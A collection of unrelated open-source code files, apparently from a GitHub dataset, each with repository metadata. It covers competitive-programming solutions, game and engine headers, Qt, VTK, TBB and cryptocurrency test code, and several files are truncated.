da453ed8bcd0ed5884d108408fce769d860e6fd3 | 5ac691580c49d8cf494d5b98c342bb11f3ff6514 | /AtCoder/abc209/abc209_d.cpp | cba492ba73faf6d096f574b798e0392e84b4876d | [] | no_license | sweatpotato13/Algorithm-Solving | e68411a4f430d0517df4ae63fc70d1a014d8b3ba | b2f8cbb914866d2055727b9872f65d7d270ba31b | refs/heads/master | 2023-03-29T23:44:53.814519 | 2023-03-21T23:09:59 | 2023-03-21T23:09:59 | 253,355,531 | 3 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 1,393 | cpp | #pragma warning(disable : 4996)
#include <bits/stdc++.h>
#define all(x) (x).begin(), (x).end()
using namespace std;
typedef long long ll;
typedef long double ld;
typedef vector<ll> vll;
typedef vector<vll> vvll;
typedef vector<ld> vld;
typedef vector<vld> vvld;
typedef pair<ll, ll> pll;
typedef pair<ld, ld> pld;
typede... | [
"sweatpotato13@gmail.com"
] | sweatpotato13@gmail.com |
8287d4c9f438bbfe68da4b3b397cf1854ff2935a | d0d22036175f861a4361e93e8f2e1e3a8064cbe0 | /individuo.h | e849a49ee5e690307b1c6215e421f9bd5d1bf71b | [] | no_license | JAAM4494/Proyecto-R-Dannel-Olivaw | 14f68902b26834cce8a4ac2a46d9647e6caae9b8 | 8a8c6da8d7d069b60f6ce4755d0bc2cee1f6fcf0 | refs/heads/master | 2021-01-16T21:28:52.600460 | 2014-04-24T19:55:24 | 2014-04-24T19:55:24 | 18,583,982 | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 934 | h | #ifndef INDIVIDUO_H
#define INDIVIDUO_H
#include <cstdlib>
#include <stdio.h>
class Individuo
{
public:
Individuo(int pId,unsigned short pCromosoma);
Individuo();
unsigned short getCromosoma();
int getId();
double getFitness();
void setFitness(double pFitness);
void setId(int id);
void ... | [
"dacoch215@gmail.com"
] | dacoch215@gmail.com |
9bd018bd175a714a1cba4899e8a7736473ab8b10 | 9f363e01f2c8f02d7409753669c757d1532b44a3 | /rush00/inc/Enemy.hpp | edb618331e4bc384e2454684d07d1bdc8a421525 | [] | no_license | LastSymbol0/cpp_piscine | 18d546b76b5003c878343996843ac7ab126c320d | c32fac08e101e565367ff536f30036a412b76a51 | refs/heads/master | 2020-08-15T03:11:38.333888 | 2019-10-15T10:32:07 | 2019-10-15T10:32:07 | 215,271,451 | 1 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 418 | hpp | #ifndef ENEMY_HPP
# define ENEMY_HPP
# include "ACharacter.hpp"
# include "Gun.hpp"
# include "ft_retro.hpp"
class Enemy : public ACharacter {
private:
int _cyclesToMove;
int _cyclesToShoot;
public:
Enemy();
Enemy(int x, int y);
Enemy(const Enemy& a);
~Enemy();
Enemy& operator=(Enemy& a);
IGameEntity* ... | [
"LastSymbol0@gmail.com"
] | LastSymbol0@gmail.com |
f54cd780043782ade07564a6a58083825e298844 | c436fc304da315ed7cfa4129faaba14d165a246e | /foundation/src/zxing/core/src/aztec/AZWriter.cpp | 0ba9a9ab6bd29c9c482c3b56abc5bb6810d9491d | [] | no_license | wjbwstone/wstone | dae656ffff30616d85293bcc356ab7ab7cebd5ba | 25da4de6900e6cc34a96a3882f1307b7a9bbf8b0 | refs/heads/main | 2023-02-17T16:44:50.679974 | 2021-01-20T05:53:24 | 2021-01-20T05:53:24 | 330,961,566 | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 1,330 | cpp | /*
* Copyright 2016 Huy Cuong Nguyen
* Copyright 2016 ZXing authors
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless re... | [
"junbo.wen@enmotech.com"
] | junbo.wen@enmotech.com |
f0eb928881859660f2ebfa69ad75494b18717789 | 2e5ebe209fa0c18f1d5b5b43a70dd2f051015bff | /src/Renderer3D/Manipulator/Manipulater.cpp | e38c72de0504fde3fa432b83eb48536f95c063d0 | [] | no_license | rishank1996/Opengl-3D-Level-Editor | a2c7b7f3472215eafe49398b74a5cc34368d3092 | 86821614687c1da6f4948c777536a21b843090c8 | refs/heads/master | 2022-03-08T09:30:50.497362 | 2019-11-22T16:31:21 | 2019-11-22T16:31:21 | null | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 112 | cpp | #include "Manipulator/Manipulater.h"
MovableAxis Manipulater::state = NO_AXIS;
Manipulater::~Manipulater()
{
} | [
"mohamed.shaalan@symbyo.com"
] | mohamed.shaalan@symbyo.com |
c4028db360071d791ae68f7d8be1fca9a778b399 | c8b39acfd4a857dc15ed3375e0d93e75fa3f1f64 | /Engine/Source/ThirdParty/IntelTBB/IntelTBB-4.0/src/tbb/tbb_main.h | 8cc034bf5c1d341e2996e8ef28724f0b01dc4f2f | [
"MIT",
"LicenseRef-scancode-proprietary-license"
] | permissive | windystrife/UnrealEngine_NVIDIAGameWorks | c3c7863083653caf1bc67d3ef104fb4b9f302e2a | b50e6338a7c5b26374d66306ebc7807541ff815e | refs/heads/4.18-GameWorks | 2023-03-11T02:50:08.471040 | 2022-01-13T20:50:29 | 2022-01-13T20:50:29 | 124,100,479 | 262 | 179 | MIT | 2022-12-16T05:36:38 | 2018-03-06T15:44:09 | C++ | UTF-8 | C++ | false | false | 3,685 | h | /*
Copyright 2005-2012 Intel Corporation. All Rights Reserved.
The source code contained or described herein and all documents related
to the source code ("Material") are owned by Intel Corporation or its
suppliers or licensors. Title to the Material remains with Intel
Corporation or its supplier... | [
"tungnt.rec@gmail.com"
] | tungnt.rec@gmail.com |
5281b8860306aa0a71f07d86017951325a8f5e70 | 81464366d3d2ab91a6600be8646d0856d413d8be | /Edit_distance.cpp | f9b3c833d563e39fdeacd6669f1a4bf9358b90da | [] | no_license | SunnyJaiswal5297/Basic_c_programs | 08f289d04817f81222ceaacd7362e47fbae2935e | a2fd6168ce4ff075be6488c172200da21058dd93 | refs/heads/master | 2022-12-03T09:53:35.189234 | 2020-07-28T17:17:17 | 2020-07-28T17:17:17 | 283,201,986 | 1 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 860 | cpp | #include<bits/stdc++.h>
using namespace std;
int main()
{
int t;
cin>>t;
while (t--)
{
int m,n,i,j;
cin>>m>>n;
char str1[m],str2[n];
for(i=0;i<m;i++)
cin>>str1[i];
for(i=0;i<n;i++)
cin>>str2[i];
int t[m+1][n+1];
for(i=0;i<=... | [
"s2jaiswal.sj@gmail.com"
] | s2jaiswal.sj@gmail.com |
28ee541b4d9edec2b2a67a7b6b83ce8abdd0174e | 0d811bc6c4435ec534300ca4578d5b8318893f16 | /04-member_attributes/sample.class.cpp | bfd1e04422d809aa5582553a4640f1a5761841e8 | [] | no_license | ekmbcd/cpp_video_lessons | 1342965437f0de8984ab75d9019d04465fa29230 | 2013e75b0bfa2c1a23af8ce8a06700f1e484f40e | refs/heads/main | 2023-04-30T16:07:31.271850 | 2021-05-12T14:43:04 | 2021-05-12T14:43:04 | 354,903,524 | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 298 | cpp | #include <iostream>
#include "sample.class.hpp"
Sample::Sample(void)
{
std::cout << "Constructor called" << std::endl;
return;
}
Sample::~Sample(void)
{
std::cout << "Destructor called" << std::endl;
return;
}
void Sample::bar(void)
{
std::cout << "Member function bar called\n";
return;
} | [
"ekmbcd@gmail.com"
] | ekmbcd@gmail.com |
9f3cd71628b034354cd396bf7a977a6448a6d410 | a14fc71a721f50fdac72dc38924918be2a1a6de1 | /Level 2 Term 2/CSE 208/Offline 7 (Binomial Heap)/IOs/Generator/Test/gen.cpp | 58d77a8b6e1abc33c8a99ff80ca727b685cc4c0c | [] | no_license | zarif98sjs/Offline-Memorial | 0022564fc94497d7d1293e2bcb9280c157cc5afd | 1036ba8e792848159b31c09911a2e0cd63cdcba3 | refs/heads/master | 2022-03-23T06:49:39.207432 | 2022-02-24T02:28:59 | 2022-02-24T02:28:59 | 168,951,578 | 1 | 1 | null | 2020-09-12T11:46:05 | 2019-02-03T14:03:45 | C++ | UTF-8 | C++ | false | false | 2,340 | cpp |
/** Which of the favors of your Lord will you deny ? **/
#include<bits/stdc++.h>
using namespace std;
#define LL long long
#define PII pair<int,int>
#define PLL pair<LL,LL>
#define F first
#define S second
#define ALL(x) (x).begin(), (x).end()
#define READ freopen("alu.txt", "r", stdin)
#define WRITE ... | [
"zarif98sjs@gmail.com"
] | zarif98sjs@gmail.com |
67ae14022184d8b924eec8c050fdd01f4d2ff611 | b4e2870e505b3a576115fa9318aabfb971535aef | /zParserExtender/ZenGin/Gothic_I_Classic/API/zSky_Outdoor.h | 092d8bb7a1342bafae91425a02c7be80c0363dd6 | [] | no_license | Gratt-5r2/zParserExtender | 4289ba2e71748bbac0c929dd1941d151cdde46ff | ecf51966e4d8b4dc27e3bfaff06848fab69ec9f1 | refs/heads/master | 2023-01-07T07:35:15.720162 | 2022-10-08T15:58:41 | 2022-10-08T15:58:41 | 208,900,373 | 6 | 1 | null | 2023-01-02T21:53:03 | 2019-09-16T21:21:28 | C++ | UTF-8 | C++ | false | false | 1,547 | h | // Supported with union (c) 2018 Union team
#ifndef __ZSKY__OUTDOOR_H__VER0__
#define __ZSKY__OUTDOOR_H__VER0__
namespace Gothic_I_Classic {
const int zEFFECT_BOX_SIDES = 2500;
const int zEFFECT_BOX_HEIGHT = 1000;
const int zMAX_FLY_PARTICLE = 1024;
const int zMAX_IMPACT_PARTICLE = 1024;
const int z... | [
"amax96@yandex.ru"
] | amax96@yandex.ru |
81528317b4373418afe0d58c270082ce8b9a1e9d | 6bf53fb560aa552acdfcd223ac945b31259ca9c1 | /src/trew/Vector2.hpp | cd74f358acc347e0240b6defd5df10555ccdbcf0 | [
"MIT"
] | permissive | yavl/trewlib | 7a4be55a0846a68b71b6488fe1c63132ecc8f97c | 03a49aa82794a42edef851456ff111156157112c | refs/heads/master | 2023-03-25T03:08:17.992246 | 2021-03-25T14:43:36 | 2021-03-25T14:43:36 | 84,576,861 | 1 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 614 | hpp | #pragma once
namespace trew {
class Vector2 {
public:
Vector2();
Vector2(float x, float y);
virtual ~Vector2() = default;
virtual Vector2 operator+(const Vector2& b) const;
virtual Vector2 operator-(const Vector2& b) const;
virtual Vector2 operator*(float scalar) const;
virtual void operator*=(fl... | [
"yavl98@mail.ru"
] | yavl98@mail.ru |
bceace4e385a52a09b60c432c0c2fa1545089702 | 70c00abb82999ed2219c565e27508fbf2300c5e8 | /sources/utils.cpp | 8012bb7156ff0083941f1fd12f49264a75ee10d2 | [] | no_license | Wintari/nokia-test-task | b2c141f128bfdf399fa4dedf135b16ed7904d210 | 28a9a3924f356018bd41b89954cdcb3280e58c58 | refs/heads/main | 2023-07-30T16:20:22.116195 | 2021-09-23T01:49:47 | 2021-09-23T01:49:47 | 408,239,848 | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 578 | cpp | #include "utils.h"
std::vector<std::string> split(const std::string& str, const std::string& delimiters){
std::vector<std::string> parts;
size_t start = 0, end = 0;
while (end < str.size()) {
end = start;
while (end < str.size() && (delimiters.find(str[end]) == std::string::npos)) {
... | [
"dimonx2000.ru@mail.ru"
] | dimonx2000.ru@mail.ru |
b1cfeea26d164357304e37637846274d0f9ffb9e | ee566f1e387d6c4009cb299a4d5f4c00bd3cc901 | /src/accel/GeantStepDiagnostic.cc | 13efd03ff859fd7f44e2c1ecf650da195cdd60e2 | [
"MIT",
"Apache-2.0"
] | permissive | celeritas-project/celeritas | 3d4f5aedd01c9c21b62ae0712c84f027e05179d3 | e7fe01331baf055393d78bdaceff8c1f7db4c9c4 | refs/heads/develop | 2023-09-01T14:10:32.210033 | 2023-08-31T21:14:20 | 2023-08-31T21:14:20 | 250,622,820 | 48 | 24 | NOASSERTION | 2023-09-14T17:11:38 | 2020-03-27T19:06:46 | C++ | UTF-8 | C++ | false | false | 3,987 | cc | //----------------------------------*-C++-*----------------------------------//
// Copyright 2022-2023 UT-Battelle, LLC, and other Celeritas developers.
// See the top-level COPYRIGHT file for details.
// SPDX-License-Identifier: (Apache-2.0 OR MIT)
//--------------------------------------------------------------------... | [
"noreply@github.com"
] | celeritas-project.noreply@github.com |
a43e2df6b2cdcf92988c4150e168c032bc7c04d1 | af2e4955496b3d43e9da74129541b5a50f63bca6 | /DLE/Editor/ObjectTool.Physics.cpp | 47282a97ea26cc8158dc714580969c29033ec705 | [
"MIT"
] | permissive | Playfloor/DLE.NET | 2bebd94cb87f6120c02733f113bc4278d109eb85 | fe422895a91a28fdee7f980f7613bb4c8c047bb0 | refs/heads/master | 2022-12-11T14:14:47.261279 | 2020-08-09T22:49:35 | 2020-08-09T22:49:35 | null | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 5,020 | cpp | #include "stdafx.h"
#include "afxpriv.h"
//------------------------------------------------------------------------------
static CSliderData sliderData [] = {
{IDC_OBJ_STRENGTH_SLIDER, 0, 8, 1, null},
{IDC_OBJ_MASS_SLIDER, 10, 20, 1, null},
{IDC_OBJ_DRAG_SLIDER, 1, 13, F1_0 / 100, null},
{IDC_OBJ_EBLOBS_SLIDER, 0... | [
"dkeymer@microsoft.com"
] | dkeymer@microsoft.com |
8f1b9b6b2bbee8d50f9a9a8ad8b10b082d85bcdc | f686a2c592a4eb01dd0cbbf5d7fee8c724784797 | /Srcs/Server/game/src/buff_on_attributes.h | 48d3d9ad0b5bbd8e7ac64f5ab2e68eb76d232ba2 | [] | no_license | samto09/AltyapiServer | a7e2d9a2fec846f764070bd5850ada1434825a19 | d41fc0709386d5def3ff3ac4274043b47c352e19 | refs/heads/master | 2023-08-11T08:32:03.062052 | 2021-09-21T02:58:34 | 2021-09-21T02:58:34 | null | 0 | 0 | null | null | null | null | UHC | C++ | false | false | 1,323 | h | #ifndef __METIN2_BUFF_ON_ATTRIBUTES_H
#define __METIN2_BUFF_ON_ATTRIBUTES_H
class CHARACTER;
class CBuffOnAttributes
{
public:
CBuffOnAttributes(LPCHARACTER pOwner, BYTE m_point_type, std::vector <BYTE>* vec_buff_targets);
~CBuffOnAttributes();
// 장착 중 이면서, m_p_vec_buff_wear_targets에 해당하는 아이템인 경우, 해당 아이템으로 인해 붙은 ... | [
"gs.eray.55@hotmail.com"
] | gs.eray.55@hotmail.com |
b5d4f29a9ef6a8621815c2407ad6d62bee7bdcc6 | 67105a904f0ebc4b710eced91de499dfe3011b28 | /main.cpp | 88ea3c4013ca89a4761c13f53ecfdcfb3d12aea4 | [] | no_license | Lotu527/ThoughtWorks | d1a63b1cb9e14954d8e9fd6257895c3925496219 | 42831d63e357a6bd470ad9aec9faa34bb3834d2e | refs/heads/master | 2020-03-19T16:15:09.591875 | 2018-06-10T06:58:52 | 2018-06-10T06:58:52 | 136,707,764 | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 431 | cpp | #include "Display.h"
#include "World.h"
const int maxRow = 60;
const int maxCow = 70;
const int minRow = 10;
const int minCow = 10;
int main(int argc, char* argv[])
{
if(argc == 2){
Display display(argv[1]);
display.animation();
}else if(argc == 1){
srand(time(NULL));
Display dis... | [
"gao527950554@foxmail.com"
] | gao527950554@foxmail.com |
59678cfb4a24eb09647cca8e172ded9d02c12b83 | 6b66afe308a49eeccc354b28303678d763b44f33 | /Code/Source/Helpers/FileResourceHandler.h | d9f308e160d7f217066a715bef5e22be6f24c093 | [
"MIT"
] | permissive | ezhangle/LmbrCoherentGT | 5526283d7d77083538568cb9206802c319fbe53d | 5dffd803cfb330262d85d5d23a6a31bf3c4fea8a | refs/heads/master | 2021-01-18T22:17:33.018541 | 2016-06-09T21:43:48 | 2016-06-09T21:43:48 | null | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 2,426 | h | #pragma once
#include <Coherent/UIGT/ResourceHandler.h>
#include <string>
#include <fstream>
// Inherint the base ResouceHandler class and use a custom implementation
// of OnResourceRead to read files.
class FileResourceHandler : public Coherent::UIGT::ResourceHandler
{
public:
virtual void OnResourceRead(
const ... | [
"cozzensbp@gmail.com"
] | cozzensbp@gmail.com |
c5527d0bf20df9cf22c137fb32f3738edbd1d388 | bc18d8ccf178debc45e0e40e069286fd8e53eadd | /nagle2/Day-III/06-coco/Tests/whatsit/inc.inc | ff0ea7ecd4b76ba6f0402f509b69052da967792f | [] | no_license | srinathv/Coding-Examples | f9689d3568aec121ab598046566a61449b3f8501 | 1bed74c431950acd306633ad5b4f9d6293a9f379 | refs/heads/master | 2021-01-19T01:21:55.589579 | 2020-10-09T21:33:08 | 2020-10-09T21:33:08 | 1,661,095 | 7 | 3 | null | null | null | null | UTF-8 | C++ | false | false | 8 | inc | yea yea
| [
"srinath.vadlamani@gmail.com"
] | srinath.vadlamani@gmail.com |
316c0d5cfa06fdbeb090202fe488da61050b5daf | 59418b5794f251391650d8593704190606fa2b41 | /plugin_api/qsf/qsf/renderer/light/OgreCompositorPassFactoryDeferredLight.h | 9da9a3fafb63a0cc6ded29e4ac6f8f7f3da4f1a8 | [] | no_license | JeveruBerry/emergency5_sdk | 8e5726f28123962541f7e9e4d70b2d8d5cc76cff | e5b23d905c356aab6f8b26432c72d18e5838ccf6 | refs/heads/master | 2023-08-25T12:25:19.117165 | 2018-12-18T16:55:16 | 2018-12-18T17:09:54 | null | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 4,246 | h | // Copyright (C) 2012-2018 Promotion Software GmbH
//[-------------------------------------------------------]
//[ Header guard ]
//[-------------------------------------------------------]
#pragma once
//[-------------------------------------------------------]
//[ Includes... | [
"christian.ofenberg@promotion-software.de"
] | christian.ofenberg@promotion-software.de |
6353a2935c2e2e2f75d9ed2d2cc26dd8a491f773 | 518bdd606d25acef6a89a5c8b0da19eed0ddb969 | /GameplayFootball/src/menu/league/league_calendar.hpp | 4f4dab3bdcd3b12a310e13480b9a8bf0e8e4fa87 | [
"MIT"
] | permissive | ElsevierSoftwareX/SOFTX-D-20-00016 | b900c40ac0565a2d7ac66ab18e92f0be903b6bba | 48c28adb72aa167a251636bc92111b3c43c0be67 | refs/heads/master | 2023-01-03T00:55:21.073395 | 2020-06-04T16:29:27 | 2020-06-04T16:29:27 | 305,829,146 | 10 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 918 | hpp | // written by bastiaan konings schuiling 2008 - 2015
// this work is public domain. the code is undocumented, scruffy, untested, and should generally not be used for anything important.
// i do not offer support, so don't ask. to be used for inspiration :)
#ifndef _HPP_MENU_LEAGUE_CALENDAR
#define _HPP_MENU_LEAGUE_CAL... | [
"francescomanigrasso13@gmail.com"
] | francescomanigrasso13@gmail.com |
eff84ef23604c08ceed584bfd7926c1aa48aa060 | a2206795a05877f83ac561e482e7b41772b22da8 | /Source/PV/build/Wrapping/ClientServer/vtkAngleRepresentation2DClientServer.cxx | f7f833850866ed376cd1fdc8158b5e45dff289d9 | [] | no_license | supreethms1809/mpas-insitu | 5578d465602feb4d6b239a22912c33918c7bb1c3 | 701644bcdae771e6878736cb6f49ccd2eb38b36e | refs/heads/master | 2020-03-25T16:47:29.316814 | 2018-08-08T02:00:13 | 2018-08-08T02:00:13 | 143,947,446 | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 8,269 | cxx | // ClientServer wrapper for vtkAngleRepresentation2D object
//
#define VTK_WRAPPING_CXX
#define VTK_STREAMS_FWD_ONLY
#include "vtkAngleRepresentation2D.h"
#include "vtkSystemIncludes.h"
#include "vtkClientServerInterpreter.h"
#include "vtkClientServerStream.h"
vtkObjectBase *vtkAngleRepresentation2DClientServerNewCom... | [
"mpasVM@localhost.org"
] | mpasVM@localhost.org |
e0ea353f279d655bb1a10e7016b7b7b3f9e9c890 | a013b422ce83ece879c44823b2cb2d2438112ccc | /showbaseclass.cpp | d31c535ac9ad65336ae88ddc410bb65e48f32659 | [] | no_license | morganaugbrown/AnimaniacsGUI | 6fc8685d1621974a821887505090cd479208459e | 031de61ddcbd5e8ee040e3d1c50ebf646ef0d2cc | refs/heads/master | 2020-04-02T15:18:32.369395 | 2018-10-31T19:23:57 | 2018-10-31T19:23:57 | 154,562,327 | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 3,418 | cpp | #include "showbaseclass.h"
#include <QTextStream>
#include <QRegularExpression>
#include <QFile>
#include <QFileInfo>
#include <QDebug>
#include "showprimarypanel.h"
#include "track.h"
#include "ledtrack.h"
#include "motortrack.h"
#include "wavtrack.h"
ShowBaseClass::ShowBaseClass(QObject *parent, QString filepath) : ... | [
"morgan.brown@eagles.oc.edu"
] | morgan.brown@eagles.oc.edu |
8e2f6f755ee0b42decae0349d7f74c958f301ee2 | 1f0386e5b79191e5f794188bd0e2fc0202b23ab8 | /ConsoleApplication10/ConsoleApplication10/Source1.cpp | 927f3f05b32450033e3844c609c9ddcbc8031e8b | [] | no_license | mayoko/ShootingBall | 25ec4057bc0ea3b418d0b929e6e5c70a8a02e21d | 8e2e3a608b1f041582c9b1e0f24cceb0470e99d9 | refs/heads/master | 2021-01-01T03:44:00.367061 | 2016-05-13T16:46:29 | 2016-05-13T16:46:29 | 56,820,188 | 0 | 0 | null | 2016-04-29T07:30:26 | 2016-04-22T02:28:30 | C++ | UTF-8 | C++ | false | false | 88 | cpp | #include<iostream>
using namespace std;
int main(){
cout<<"Wodka!"<<endl;
return 0;
} | [
"ryohayashi3571@gmail.com"
] | ryohayashi3571@gmail.com |
5cdf5dd896e4c2982f6d81fdd5e7c90656468f30 | d775007b617dcdb9b3506fc09c42fd3ba14eae74 | /src/compat/assumptions.h | 1935f911fdbf605f137e19fa18e1ebd226cf025b | [
"MIT"
] | permissive | markblundeberg/bitcoin-abc | 495958f5431dbfcbdc04f93cd36116dd73a86b3b | 449bfe2bb4b2edc17e2c8618f04bce1bc05fe466 | refs/heads/master | 2020-04-10T07:59:02.002604 | 2019-11-19T13:48:53 | 2019-11-19T17:09:02 | 160,894,695 | 1 | 2 | MIT | 2019-06-07T20:24:36 | 2018-12-08T02:03:19 | C++ | UTF-8 | C++ | false | false | 1,990 | h | // Copyright (c) 2009-2010 Satoshi Nakamoto
// Copyright (c) 2009-2019 The Bitcoin Core developers
// Distributed under the MIT software license, see the accompanying
// file COPYING or http://www.opensource.org/licenses/mit-license.php.
// Compile-time verification of assumptions we make.
#ifndef BITCOIN_COMPAT_ASSU... | [
"fpelliccioni@gmail.com"
] | fpelliccioni@gmail.com |
e1f1f404977dad14fafb0164facd13df05a009f0 | c4b544d9ff751fb6007f4a305a7c764c860f93b4 | /test/ext/boost/fusion/functor/replace.cpp | 7d37aa29f1186fbdd7e402bb01e82217fc399f53 | [
"LicenseRef-scancode-unknown-license-reference",
"BSL-1.0"
] | permissive | rbock/hana | cc630ff26c9c78cebe5facaeb98635a4d5afcc50 | 2b76377f91a5ebe037dea444e4eaabba6498d3a8 | refs/heads/master | 2021-01-16T21:42:59.613464 | 2014-08-08T02:38:54 | 2014-08-08T02:38:54 | 23,278,630 | 2 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 898 | cpp | /*
@copyright Louis Dionne 2014
Distributed under the Boost Software License, Version 1.0.
(See accompanying file LICENSE.md or copy at http://boost.org/LICENSE_1_0.txt)
*/
#include <boost/hana/ext/boost/fusion.hpp>
#include <boost/hana/detail/constexpr.hpp>
#include "../helper.hpp"
#include <cassert>
using namespa... | [
"ldionne.2@gmail.com"
] | ldionne.2@gmail.com |
e7f1c84099670a7d5a7c9e4c3dafbf72965a7483 | 830fa54fadf84a020219b40f152ba9fad050da85 | /src/31.next-permutation.cpp | 464d1beb4267019b48577eb69297cb7318d2fe7b | [] | no_license | Jinchenyuan/LeetCode | fbedb88c9ef7654b41da25f2c1d149ecdef6d54e | 6de769c7a3312b20d24efcb64356515f472efd4b | refs/heads/master | 2023-05-04T23:31:33.901465 | 2023-04-22T16:32:54 | 2023-04-22T16:32:54 | 186,218,266 | 2 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 2,416 | cpp | #include <iostream>
#include <vector>
using namespace std;
/*
* @lc app=leetcode id=31 lang=cpp
*
* [31] Next Permutation
*/
class Solution {
private:
void swap(int &a, int &b)
{
a = a ^ b;
b = a ^ b;
a = a ^ b;
}
void sortquick(vector<int> &nums, int start, int end)
{
... | [
"jinchenyuan@outlook.com"
] | jinchenyuan@outlook.com |
9f01e7b74c9bdc056a05fc6a49ae29146aa4eddc | b367fe5f0c2c50846b002b59472c50453e1629bc | /xbox_leak_may_2020/xbox trunk/xbox/private/ui/maxsdk/SAMPLES/vrmlexp/EvalCol.cpp | c0c7252cf21debbce1c188ccda2a4baf3321bef8 | [] | no_license | sgzwiz/xbox_leak_may_2020 | 11b441502a659c8da8a1aa199f89f6236dd59325 | fd00b4b3b2abb1ea6ef9ac64b755419741a3af00 | refs/heads/master | 2022-12-23T16:14:54.706755 | 2020-09-27T18:24:48 | 2020-09-27T18:24:48 | null | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 44,784 | cpp | /**********************************************************************
*<
FILE: EvalCol.cpp
DESCRIPTION: Vertex Color Renderer
CREATED BY: Christer Janson
HISTORY: Created Monday, December 12, 1996
*> Copyright (c) 1997 Kinetix, All Rights Reserved.
*************************************************... | [
"benjamin.barratt@icloud.com"
] | benjamin.barratt@icloud.com |
af9e1983daa1c7dbd55aefafcbc02ddfd404cd55 | d52d5fdbcd848334c6b7799cad7b3dfd2f1f33e4 | /third_party/folly/folly/File.h | 2a246d7894454298f7237bc5e47d52689e591a05 | [
"Apache-2.0"
] | permissive | zhiliaoniu/toolhub | 4109c2a488b3679e291ae83cdac92b52c72bc592 | 39a3810ac67604e8fa621c69f7ca6df1b35576de | refs/heads/master | 2022-12-10T23:17:26.541731 | 2020-07-18T03:33:48 | 2020-07-18T03:33:48 | 125,298,974 | 1 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 4,127 | h | /*
* Copyright 2013-present Facebook, Inc.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable... | [
"yangshengzhi1@bigo.sg"
] | yangshengzhi1@bigo.sg |
3d38322036d69a96a0ff4740cd58750f8746db6f | 3482e6df74b3b47854adfe6050c60f7d206ed86b | /c++/mfc/Fensteranpassung/FensteranpassungView.cpp | f6c1cce7754c61101ec98751afab7b26863f3c70 | [] | no_license | acpanna/coding | 8bef9275dc8a6606cc9d687bb3683ead79dacb7c | a0c9a6023c91c5a6f220b9b9f7170f7cb0b12c72 | refs/heads/master | 2020-12-03T08:13:17.116743 | 2013-10-01T08:02:47 | 2013-10-01T08:02:47 | null | 0 | 0 | null | null | null | null | ISO-8859-1 | C++ | false | false | 2,327 | cpp | // FensteranpassungView.cpp : Implementierung der Klasse CFensteranpassungView
//
#include "stdafx.h"
#include "Fensteranpassung.h"
#include "FensteranpassungDoc.h"
#include "FensteranpassungView.h"
#ifdef _DEBUG
#define new DEBUG_NEW
#undef THIS_FILE
static char THIS_FILE[] = __FILE__;
#endif
//////... | [
"heiko.vogel@birdworx.de"
] | heiko.vogel@birdworx.de |
cc8d11846b40411b49cd3d376359d8a39ee72130 | 59c47e1f8b2738fc2b824462e31c1c713b0bdcd7 | /002-Qt_widget_Concerning/000-Qt-widget-project/WindowsAPP/BST_IDE/global/uifun.h | 5911d7ed9244a34890295d6a80508dc57ac2599c | [] | no_license | casterbn/Qt_project | 8efcc46e75e2bbe03dc4aeaafeb9e175fb7b04ab | 03115674eb3612e9dc65d4fd7bcbca9ba27f691c | refs/heads/master | 2021-10-19T07:27:24.550519 | 2019-02-19T05:26:22 | 2019-02-19T05:26:22 | null | 0 | 0 | null | null | null | null | GB18030 | C++ | false | false | 10,262 | h | #ifndef UIFUN_H
#define UIFUN_H
#include "bggen.h"
#include "bstui.h"
#ifndef DISPLAY
#include "picflow.h"
#endif
#include <QTime>
#include <QVector>
#include <QDir>
#include <QKeyEvent>
#ifdef SUPPORT_WIDGET
#include <QUiLoader>
#endif
#ifdef SURRPORT_3D
#include <QtOpenGL>
#include <QGLWidget>
#... | [
"1343726739@qq.com"
] | 1343726739@qq.com |
bc5b8531a9696a9646bcf8a52580a68aecc1c42a | 73f31f05b8bb5940558b04e74ad7086122973d5e | /src/test/main_tests.cpp | 91a3d64a806509ea076897cc4be4e5072d63d936 | [
"MIT"
] | permissive | platincoin-project/platincoin | a616f64989d02340f31408851215f06b2d21c148 | e3c4cfc90c37293c1dce8a829b5eb64c587fd33d | refs/heads/master | 2021-04-06T08:33:12.143549 | 2020-02-19T09:10:19 | 2020-02-19T09:10:19 | 124,369,122 | 18 | 10 | null | null | null | null | UTF-8 | C++ | false | false | 1,734 | cpp | // Copyright (c) 2014-2016 The Bitcoin Core developers
// Distributed under the MIT software license, see the accompanying
// file COPYING or http://www.opensource.org/licenses/mit-license.php.
#include "chainparams.h"
#include "validation.h"
#include "net.h"
#include "test/test_bitcoin.h"
#include <boost/signals2/s... | [
"support@platin-genesis.com"
] | support@platin-genesis.com |
a387f78b64070eb363eb4e128cead6c827a35654 | b5a5ce5f08070c957ff74cd2c6495d55acf3d75b | /src/vlCore/plugins/ioTIFF.cpp | ea23cd34b28391eb48f8fa14c8a30c6385040bdb | [
"BSD-2-Clause"
] | permissive | mechmaster/VisualizationLibrary | dadf2ab1f36acb9c3168e167385718aa1a8660c9 | 32244b76c8534f8cdf53c545a37d085d5b95ee64 | refs/heads/master | 2021-01-13T15:04:59.360095 | 2016-12-15T16:34:13 | 2016-12-15T16:34:13 | 76,274,291 | 0 | 0 | null | 2016-12-15T16:34:13 | 2016-12-12T16:25:50 | C++ | UTF-8 | C++ | false | false | 11,962 | cpp | /**************************************************************************************/
/* */
/* Visualization Library */
